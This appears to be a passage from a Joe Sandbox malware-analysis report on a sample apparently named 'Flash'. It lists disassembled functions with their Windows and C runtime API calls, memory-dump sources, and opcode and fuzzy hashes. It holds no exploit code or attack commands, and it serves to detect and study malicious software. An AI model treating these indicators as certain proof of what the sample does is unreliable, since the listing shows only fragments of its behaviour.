                                                        • Opcode Fuzzy Hash: 9ab94599629eaccf0c71ee3c06f139c281c6559c9d25a2757990e28b97ede058
                                                        • Instruction Fuzzy Hash: 8A01B570244349BEF3214E29CD8AF667A9CEB06768F10C719FAE56A1E1C7F45C858B14
                                                        APIs
                                                          • Part of subcall function 009F593C: __FF_MSGBANNER.LIBCMT ref: 009F5953
                                                          • Part of subcall function 009F593C: __NMSG_WRITE.LIBCMT ref: 009F595A
                                                          • Part of subcall function 009F593C: RtlAllocateHeap.NTDLL(00F50000,00000000,00000001,?,00000004,?,?,009F1003,?), ref: 009F597F
                                                        • std::exception::exception.LIBCMT ref: 009F101C
                                                        • __CxxThrowException@8.LIBCMT ref: 009F1031
                                                          • Part of subcall function 009F87CB: RaiseException.KERNEL32(?,?,?,00A8CAF8,?,?,?,?,?,009F1036,?,00A8CAF8,?,00000001), ref: 009F8820
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                        • String ID:
                                                        • API String ID: 3902256705-0
                                                        • Opcode ID: c280925ca4ef7dee44aa34b6d872c85dbf1176fb4ab1ac9005a1b9aa568b0e24
                                                        • Instruction ID: d8d504a2c3dca9ac2923d7f865359ac292e1aec0c0b2a81976450099a0a82adf
                                                        • Opcode Fuzzy Hash: c280925ca4ef7dee44aa34b6d872c85dbf1176fb4ab1ac9005a1b9aa568b0e24
                                                        • Instruction Fuzzy Hash: 33F0A43550421DF6CF24BA58DC15BFE7BAC9F42350F100855FA1492191DFB18B81C7E0
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: __lock_file_memset
                                                        • String ID:
                                                        • API String ID: 26237723-0
                                                        • Opcode ID: f6ccaf863c401df733e8760102e84958b088e7a528bf7193f94223cb68247f06
                                                        • Instruction ID: f5e212c9ff919f8683f2f627dc1b326ec403998f703da00ffa1dadc71ea613bb
                                                        • Opcode Fuzzy Hash: f6ccaf863c401df733e8760102e84958b088e7a528bf7193f94223cb68247f06
                                                        • Instruction Fuzzy Hash: CC014471800B4DEBCF11AF66CC01ABF7B65AFC07A0F198116BB245B1A1DB358A21DF91
                                                        APIs
                                                          • Part of subcall function 009F8D58: __getptd_noexit.LIBCMT ref: 009F8D58
                                                        • __lock_file.LIBCMT ref: 009F560B
                                                          • Part of subcall function 009F6E3E: __lock.LIBCMT ref: 009F6E61
                                                        • __fclose_nolock.LIBCMT ref: 009F5616
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                        • String ID:
                                                        • API String ID: 2800547568-0
                                                        • Opcode ID: a8ab8a336b18388bebce54cd2e2a14dbd03f00dd52a3bd2895caac5f678d5a23
                                                        • Instruction ID: 55633abe63e325c10d5c6ce6aa730dd510086b917b0392986d39ebb61df0b8ec
                                                        • Opcode Fuzzy Hash: a8ab8a336b18388bebce54cd2e2a14dbd03f00dd52a3bd2895caac5f678d5a23
                                                        • Instruction Fuzzy Hash: FDF0B471901B0D9BD7507B75880277F77E56F80335F128609B724AB1C1CB7C49019F51
                                                        APIs
                                                        • __lock_file.LIBCMT ref: 009F5EB4
                                                        • __ftell_nolock.LIBCMT ref: 009F5EBF
                                                          • Part of subcall function 009F8D58: __getptd_noexit.LIBCMT ref: 009F8D58
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                        • String ID:
                                                        • API String ID: 2999321469-0
                                                        • Opcode ID: e93f8ea9d27403064af7ddf55eabf3273e684c279d6fa9a98280e20ad7a69443
                                                        • Instruction ID: 8e2d50c03a66ffa7def1cff2af94623190a43acae826a1f1ec3a38b4febebcd4
                                                        • Opcode Fuzzy Hash: e93f8ea9d27403064af7ddf55eabf3273e684c279d6fa9a98280e20ad7a69443
                                                        • Instruction Fuzzy Hash: 17F0A77191161DAADB40BB74880377F76906F91331F124606A220AB1C1CF788A019B51
                                                        APIs
                                                        • _memset.LIBCMT ref: 009E5AEF
                                                        • Shell_NotifyIconW.SHELL32(00000002,?), ref: 009E5B1F
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: IconNotifyShell__memset
                                                        • String ID:
                                                        • API String ID: 928536360-0
                                                        • Opcode ID: f7fd7c7ed45dc1464c13f738f01a766e11b9717f4db6a0ed52c1138c6b3246fd
                                                        • Instruction ID: 21d0ab69b3aa217dfe179bf6e9bccbfe53e45a679023c9f47917a73a7276fe5e
                                                        • Opcode Fuzzy Hash: f7fd7c7ed45dc1464c13f738f01a766e11b9717f4db6a0ed52c1138c6b3246fd
                                                        • Instruction Fuzzy Hash: 03F0A7709283089FD7A2DB64DC497EA77BC970130CF0401EAEA4896292DF750B89CF55
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: LoadString$__swprintf
                                                        • String ID:
                                                        • API String ID: 207118244-0
                                                        • Opcode ID: 4854193d77c45efba293a5eb1ee467bb9619a7bf1fee8f08709128a3246d739d
                                                        • Instruction ID: 745169a23e0db0da2fce5b47f540a7e089b0ab99dfa931479405653dbb7d4918
                                                        • Opcode Fuzzy Hash: 4854193d77c45efba293a5eb1ee467bb9619a7bf1fee8f08709128a3246d739d
                                                        • Instruction Fuzzy Hash: 5BB15E39A01109DFCB14DF98D895EEEB7B5FF88720F10811AF919AB291EB70AD41CB50
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e0e5af78225d6d3d36f6d680479f726b6aede2d0f2297c8db7b636f6276ddc96
                                                        • Instruction ID: b8980dd1f53ac8253815d25deb7e39652a4badcacf0b045a78259721c2f5df97
                                                        • Opcode Fuzzy Hash: e0e5af78225d6d3d36f6d680479f726b6aede2d0f2297c8db7b636f6276ddc96
                                                        • Instruction Fuzzy Hash: AB61CA70640206DFDB10DF60C891BBAB7E9EF44310F15852AE9169B392D778EDA0CB52
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e8880ce9a2a0ac00e8a3d3ae4d54339fbb7ee274b2057cd6b1025fcd5e1c2999
                                                        • Instruction ID: aae4ba8505bd88ea9abb5aa53182d90eb5667b4f045a15c64eeca559c1d26684
                                                        • Opcode Fuzzy Hash: e8880ce9a2a0ac00e8a3d3ae4d54339fbb7ee274b2057cd6b1025fcd5e1c2999
                                                        • Instruction Fuzzy Hash: 1A519275600604AFCB15EF68C995FAE77A6AF85310F1485A9F9169B392CB30ED41CB80
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID:
                                                        • API String ID: 4104443479-0
                                                        • Opcode ID: c9f64c45f400e17b5458663199bf4a27315daf1ddd9ff02163ddc624897d631a
                                                        • Instruction ID: 1405caa4a244df8031a036b51fcc207b7695ca90adea71beb76680e192fc1533
                                                        • Opcode Fuzzy Hash: c9f64c45f400e17b5458663199bf4a27315daf1ddd9ff02163ddc624897d631a
                                                        • Instruction Fuzzy Hash: 4D31D275204642EFC726DF1AD484A21F7E4FF48310B14C569F98A8B7A5EB30EC81CB80
                                                        APIs
                                                        • SetFilePointerEx.KERNEL32(00000000,?,00000001,00000000,00000000,00000000,00000000,00000000), ref: 009E41B2
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: FilePointer
                                                        • String ID:
                                                        • API String ID: 973152223-0
                                                        • Opcode ID: 4508535cbed36a4b7ef41d8d21ac97e86739ac73c60f733ef07044662233f2e5
                                                        • Instruction ID: 4ddb7c5b5ccc4141f41677fdcbf9daad64b111b2b2451e3898483b89ffba690a
                                                        • Opcode Fuzzy Hash: 4508535cbed36a4b7ef41d8d21ac97e86739ac73c60f733ef07044662233f2e5
                                                        • Instruction Fuzzy Hash: 0C316171A04696AFCF19CF6EC884A5DB7B5FFA8310F158629E81593710D770BDA0CB90
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: ClearVariant
                                                        • String ID:
                                                        • API String ID: 1473721057-0
                                                        • Opcode ID: df24692242ef354d4f5994db24e9578168da97d66f3282cfef27fff0ed344c7d
                                                        • Instruction ID: 1ecc5f392ac937ba60de5d87b64a60d65454a1e48c07a4c91ca7dbf557b6ea8a
                                                        • Opcode Fuzzy Hash: df24692242ef354d4f5994db24e9578168da97d66f3282cfef27fff0ed344c7d
                                                        • Instruction Fuzzy Hash: 83414874508345DFDB24CF14C484B1ABBE1BF85308F0988ADE9898B362C735EC85CB92
                                                        APIs
                                                          • Part of subcall function 009E4B29: FreeLibrary.KERNEL32(00000000,?), ref: 009E4B63
                                                          • Part of subcall function 009F547B: __wfsopen.LIBCMT ref: 009F5486
                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,009E27AF,?,00000001), ref: 009E49F4
                                                          • Part of subcall function 009E4ADE: FreeLibrary.KERNEL32(00000000), ref: 009E4B18
                                                          • Part of subcall function 009E48B0: _memmove.LIBCMT ref: 009E48FA
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Library$Free$Load__wfsopen_memmove
                                                        • String ID:
                                                        • API String ID: 1396898556-0
                                                        • Opcode ID: 4126b26ce22db93adbe4748b6d658d20f42f893c4619ca6189d72d371c990a82
                                                        • Instruction ID: 59549c7c988849f7e6b5e4aa718edd0ffe6f82431d0c577e75e485c6706e5913
                                                        • Opcode Fuzzy Hash: 4126b26ce22db93adbe4748b6d658d20f42f893c4619ca6189d72d371c990a82
                                                        • Instruction Fuzzy Hash: 02113A32650205ABCB12FF71CD02FAE77A99F84711F10483DF541A6192EF708E00AB98
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID:
                                                        • API String ID: 4104443479-0
                                                        • Opcode ID: ed768318928ad9db74eb72ab79bc14ac0b3ac671dc733207cff94445e1afad0c
                                                        • Instruction ID: e51cce34e782462187b546b977b96a1f47cd7f6db6131eaab10b72818a77eff9
                                                        • Opcode Fuzzy Hash: ed768318928ad9db74eb72ab79bc14ac0b3ac671dc733207cff94445e1afad0c
                                                        • Instruction Fuzzy Hash: 01114C76204605DFC724CF29D481A26B7E9FF49354724882EE59ACB261E732E841CB50
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: ClearVariant
                                                        • String ID:
                                                        • API String ID: 1473721057-0
                                                        • Opcode ID: 66bf8f2836e97992bbc340b21769bcab35f7d2193e4d5ffe80402f7b6f3948ae
                                                        • Instruction ID: 7cd96d876011986b79512be03d44e948905c21a25390e58376bbb896f57152c4
                                                        • Opcode Fuzzy Hash: 66bf8f2836e97992bbc340b21769bcab35f7d2193e4d5ffe80402f7b6f3948ae
                                                        • Instruction Fuzzy Hash: D4212FB4948345DFCB24DF54C444B1ABBE5BF88304F09896DF98A97362C731E849CB92
                                                        APIs
                                                        • ReadFile.KERNEL32(00000000,?,00010000,00000000,00000000,00000000,00000000,00010000,?,009E3CF8,00000000,00010000,00000000,00000000,00000000,00000000), ref: 009E4276
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: 7280b3445a6ab026ecc2825ca6ecfd301f0ce4f0b16b5c9e901c190f5fb7a6ab
                                                        • Instruction ID: 1c65688b5e91029e93fab07b86bdfb014f04d2047e4d95778ba3174663b32482
                                                        • Opcode Fuzzy Hash: 7280b3445a6ab026ecc2825ca6ecfd301f0ce4f0b16b5c9e901c190f5fb7a6ab
                                                        • Instruction Fuzzy Hash: D9113A312007419FD721CF56C480B62B7F9EF88720F10C92DEABA86A50D7B4EC45CB60
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID:
                                                        • API String ID: 4104443479-0
                                                        • Opcode ID: 602e865249ec947d912e947e17fccc617bf4509f125e4f05857fa8c8b0e3221e
                                                        • Instruction ID: 9d1529ba72de01ada9994978046480cbee913e499f0d48154466a423a596bb61
                                                        • Opcode Fuzzy Hash: 602e865249ec947d912e947e17fccc617bf4509f125e4f05857fa8c8b0e3221e
                                                        • Instruction Fuzzy Hash: E001D6722017056ED7255B39DC02B77BB98EB847A0F10853AF61ACA1D1EA31E8408794
                                                        APIs
                                                          • Part of subcall function 009F0FE6: std::exception::exception.LIBCMT ref: 009F101C
                                                          • Part of subcall function 009F0FE6: __CxxThrowException@8.LIBCMT ref: 009F1031
                                                        • _memset.LIBCMT ref: 00A37CB4
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Exception@8Throw_memsetstd::exception::exception
                                                        • String ID:
                                                        • API String ID: 525207782-0
                                                        • Opcode ID: 5db2a621b77f9f51e6d0df2e5d73dbc3d80b50fddd4bc919c38652e4ccf84bab
                                                        • Instruction ID: 73dae4dc8f4f4936827d8ec8ce594774b0ea6f6dfe1ec72abd810e7d249456c5
                                                        • Opcode Fuzzy Hash: 5db2a621b77f9f51e6d0df2e5d73dbc3d80b50fddd4bc919c38652e4ccf84bab
                                                        • Instruction Fuzzy Hash: 8301F6742042049FD325EF5CD541F19BBE5AF9D310F24C45AF6888B392DB72E800CB90
                                                        APIs
                                                          • Part of subcall function 009F0FE6: std::exception::exception.LIBCMT ref: 009F101C
                                                          • Part of subcall function 009F0FE6: __CxxThrowException@8.LIBCMT ref: 009F1031
                                                        • _memmove.LIBCMT ref: 00A0DC8B
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Exception@8Throw_memmovestd::exception::exception
                                                        • String ID:
                                                        • API String ID: 1602317333-0
                                                        • Opcode ID: 622f045ca02a7aa9060e93de149df61a25bdc93ff1b8cc602b6dbfb0cb7149fa
                                                        • Instruction ID: 834e1e900a32b9393e042461053cfe3deb605c1449e1a60d57b0bebcf75e588b
                                                        • Opcode Fuzzy Hash: 622f045ca02a7aa9060e93de149df61a25bdc93ff1b8cc602b6dbfb0cb7149fa
                                                        • Instruction Fuzzy Hash: 22F01274644105DFD710DF68C541F25BBE1BF9E300B24845DE2898B392E733D811CB91
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: _fseek
                                                        • String ID:
                                                        • API String ID: 2937370855-0
